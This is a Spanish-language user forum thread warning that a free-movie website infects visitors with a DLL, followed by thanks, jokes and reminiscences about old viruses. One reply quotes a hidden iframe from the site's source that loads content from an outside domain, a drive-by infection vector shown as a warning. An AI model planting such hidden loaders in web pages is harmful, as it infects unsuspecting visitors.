Banda Ancha EU

Comunidad de usuarios
de fibra, móvil y ADSL

aviso sobre pagina de pelis y lo que pasa al entrar

NomadaEgosanti

hola a todos, cuidado con la pagina www.cinegratis.net

Hace unos dias me di cuenta a traves de mi cortafuegos, el outpost, que ibm00002.dll actualizaba cositas por mi ordenador, archivos temporales que no se borraban etc etc y di con esto googleando un poco

(link roto)

desinfecte, entro hoy en esa pagina y cual es mi sorpresa que a los 3 minutos me aparece la misma dll dando el coñazo.

Siento hacer spam pero creo que es necesario avisar...

PD - el spybot no lo saca, al final utilice el fileassassing

Este tema está cerrado a nuevas respuestas. Abre un nuevo tema para retomar la conversación.
txus007

Gracias por el aviso.
Salu2

BocaDePez
BocaDePez

Excelente aporte :) . De hecho se me ha ocurrido que sería realmente útil un hilo acerca de páginas que lleven a cabo este tipo de prácticas.

Saludos y Feliz Navidad :-P xD, jejeje

txus007

Pues no estaria mal lo que dice el bocadepez, hacer un hilo con chincheta, avisando de los sitios peligrosos.
Salu2

🗨️ 1
NomadaEgosanti

estaria de puta madre la verdad. Ahora que lo pienso... tengo el portatil de curro infectado JAAJAJAJAJAJAJAJ

BocaDePez
BocaDePez

[ Contenido borrado por el moderador ]

🗨️ 5
BocaDePez
BocaDePez

🗨️ 4
BocaDePez
BocaDePez

🗨️ 3
overpeer

Tal vez cuando tenga más del 5% de cuota de mercado quizás haYa posibilidad de que se difunda algo.

Si se usa Windows en modo usuario también es dificil que te infecte uno.

🗨️ 2
BocaDePez
BocaDePez
Bilbokoa

Gracias por el aviso. Se agradece. ;-)

Antimonio

Vaya, pues he entrado con Firefox y con IE y no he conseguido infectarme.

🗨️ 11
KarmaZenBuffer

vaya pues menos mal que era un virus de nada... pero eSO De probar a ver..

imaginese que le hubiesen contado... tengo una pistola en casa y cuando la meto en agua, en la bañera, me la pongo en la SIEN y no funciona...

y entonces Antimonio, va y hace la prueba experimental... a ve que pasa...

y luego escribe un familiar diciendo que la de ANTIMONIO si funcionaba debajo del agua ;-)

🗨️ 2
Antimonio

jajaja muy bueno. Pero, ¿como voy a saber si funciona mi chaleco antibalas si no lo pruebo de vez en cuando? Además, en realidad estos virus/spyware de pacotilla de hoy en dia son fáciles de eliminar con las herramientas adecuadas (y con la cantidad de gente que me da la tabarra con el tema he coleccionado bastantes)... ah... que tiempos aquellos del viernes 13, el stoned, el barrotes... :-D

🗨️ 1
KarmaZenBuffer

esos tiempos del MS-DOs y poco mas...

" cual-quier tiempo pasado fue mejor "

Mentira cochina... con lo facil que es ahora 4 pasos, un tarjeta de credito y PROBLEMAS solucionados...

el ma entonces eran los DISKOS de 3.5"... eran el transmisor del mal... ahora el mal es "el quiero descargar todo lo que pueda aunque no lo vea"

edit: pero de entonces como bien comentan a karma los VIRUS si que eran DAÑINOS. de narices. se cargaban el disco, sector, datos, ficheros TODO..

ahora cual es el problema ? que compartes Tu disco sin permiso, troyanos ?, que usan tu "ancho de banda" ?

bienvenidos al mundo globalizado. no les gusta compartir ? pues compartan hombre compartan... ;-)

NomadaEgosanti

Pues yo si, con firefox ultima version.

🗨️ 7
BocaDePez
BocaDePez

Y yo te creo, he bajado el código a un txt y me encuentro esto tan feo. xDD

div style="visibility:hidden" iframe src="http://gfeptwe.com/ld/grb/" width=100 height=80 /iframe /div

🗨️ 6
KarmaZenBuffer

pero pagaIs el antivirus ALMAS candidas ? o vais a la selva segun papi os trajo al mundo...

PD: no es garantia 100%... pero es que ya le vale al personal... encima de "descargar" por descargar se quejan de 4 virucos de na...

🗨️ 5
BocaDePez
BocaDePez
Buster
🗨️ 2
BocaDePez
BocaDePez
🗨️ 1
Buster